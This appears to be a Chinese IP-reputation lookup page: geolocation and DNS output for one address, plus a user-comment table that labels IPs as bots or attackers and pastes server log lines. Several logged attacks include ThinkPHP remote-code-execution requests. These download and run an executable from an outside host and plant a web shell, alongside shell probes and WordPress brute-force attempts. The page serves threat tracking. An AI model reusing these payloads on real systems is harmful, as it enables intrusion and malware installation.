城市(city): Amsterdam
省份(region): Noord Holland
国家(country): The Netherlands
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 172.211.115.147
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14500
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;172.211.115.147. IN A
;; AUTHORITY SECTION:
. 29 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2024121700 1800 900 604800 86400
;; Query time: 13 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Dec 17 19:23:35 CST 2024
;; MSG SIZE rcvd: 108Host 147.115.211.172.in-addr.arpa. not found: 3(NXDOMAIN)Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 147.115.211.172.in-addr.arpa: NXDOMAIN| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 42.236.55.21 | bots | 不常见的360爬虫。。 |
2019-03-29 10:37:48 |
| 66.249.83.206 | normal | google weblight 地址,为信号差的地方服务,算是一个正常ip |
2019-03-29 14:07:35 |
| 58.251.121.185 | attack | 58.251.121.185 - - [06/Apr/2019:14:46:36 +0800] "GET /xiaohei.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 59.36.119.227 - - [06/Apr/2019:14:46:36 +0800] "GET /sha.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.185 - - [06/Apr/2019:14:46:36 +0800] "GET /xiaohei.php HTTP/1.1" 404 209 "http://118.25.52.138/xiaohei.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-06 14:49:21 |
| 118.25.71.65 | attack | 攻击型IP
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-03-31 17:58:18 |
| 77.1.146.159 | attack | 77.1.146.159 - - [05/Apr/2019:20:16:40 +0800] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 77.1.146.159 - - [05/Apr/2019:20:16:41 +0800] "GET /mysql/dbadmin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 77.1.146.159 - - [05/Apr/2019:20:16:41 +0800] "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 77.1.146.159 - - [05/Apr/2019:20:16:43 +0800] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" |
2019-04-05 20:21:20 |
| 77.247.109.8 | attack | 端口扫描 黑客攻击 |
2019-04-04 08:12:04 |
| 203.208.60.13 | bots | 提交sitemap后Google使用的useragent |
2019-03-30 08:40:05 |
| 183.57.53.177 | attack | 183.57.53.177 - - [01/Apr/2019:15:40:53 +0800] "GET /info1.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 183.57.53.177 - - [01/Apr/2019:15:40:53 +0800] "GET /p.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 183.57.53.177 - - [01/Apr/2019:15:40:53 +0800] "GET /info1.php HTTP/1.1" 404 209 "http://118.25.52.138/info1.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 183.57.53.177 - - [01/Apr/2019:15:40:53 +0800] "GET /p.php HTTP/1.1" 404 209 "http://118.25.52.138/p.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-01 15:41:23 |
| 66.249.64.122 | bots | 爬虫Google |
2019-04-01 09:21:54 |
| 193.201.224.220 | attack | wordpress 暴力破戒攻击 193.201.224.220 - - [31/Mar/2019:18:05:02 +0800] "POST /wp-login.php HTTP/1.1" 200 5002 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0" |
2019-03-31 19:57:42 |
| 59.36.119.226 | attack | 59.36.119.226 - - [06/Apr/2019:14:35:29 +0800] "GET /hm.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 59.36.119.227 - - [06/Apr/2019:14:35:29 +0800] "GET /mysql/admin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.186 - - [06/Apr/2019:14:35:29 +0800] "GET /program/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 59.36.119.226 - - [06/Apr/2019:14:35:29 +0800] "GET /hm.php HTTP/1.1" 404 209 "http://118.25.52.138/hm.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 59.36.119.227 - - [06/Apr/2019:14:35:29 +0800] "GET /mysql/admin/index.php HTTP/1.1" 404 209 "http://118.25.52.138/mysql/admin/index.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-06 14:37:06 |
| 115.87.27.91 | attack | 115.87.27.91 - - [04/Apr/2019:18:44:53 +0800] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" |
2019-04-04 18:46:39 |
| 101.227.151.57 | attack | 101.227.151.57 - - [06/Apr/2019:18:57:27 +0800] "GET /pk1914.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 101.227.151.57 - - [06/Apr/2019:18:57:27 +0800] "GET /pk1914.php HTTP/1.1" 404 209 "http://118.25.52.138/pk1914.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-06 19:00:44 |
| 118.190.84.33 | attack | 118.190.84.33 - - [04/Apr/2019:13:19:38 +0800] "POST /wuwu11.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" 118.190.84.33 - - [04/Apr/2019:13:19:38 +0800] "GET /wuwu11.php HTTP/1.1" 404 232 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" 118.190.84.33 - - [04/Apr/2019:13:19:38 +0800] "POST /wuwu11.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" 118.190.84.33 - - [04/Apr/2019:13:19:38 +0800] "GET /wuwu11.php HTTP/1.1" 404 232 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" 118.190.84.33 - - [04/Apr/2019:13:19:39 +0800] "POST /wuwu11.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" 118.190.84.33 - - [04/Apr/2019:13:19:39 +0800] "GET /wuwu11.php HTTP/1.1" 404 232 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" |
2019-04-04 13:26:43 |
| 80.82.77.33 | bots | 80.82.77.33 - - [05/Apr/2019:13:44:18 +0800] "GET / HTTP/1.1" 200 10269 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" 80.82.77.33 - - [05/Apr/2019:13:44:24 +0800] "" 400 0 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:32 +0800] "" 400 0 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:32 +0800] "" 400 0 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:35 +0800] "" 400 0 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:38 +0800] "quit" 400 182 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:41 +0800] "GET /robots.txt HTTP/1.1" 200 292 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:45 +0800] "GET /.well-known/security.txt HTTP/1.1" 404 232 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:45 +0800] "GET /sitemap.xml HTTP/1.1" 200 1425241 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:46 +0800] "GET /favicon.ico HTTP/1.1" 200 4286 "-" "python-requests/2.13.0" 80.82.77.33 - - [05/Apr/2019:13:44:47 +0800] "" 400 0 "-" "-" |
2019-04-05 13:47:49 |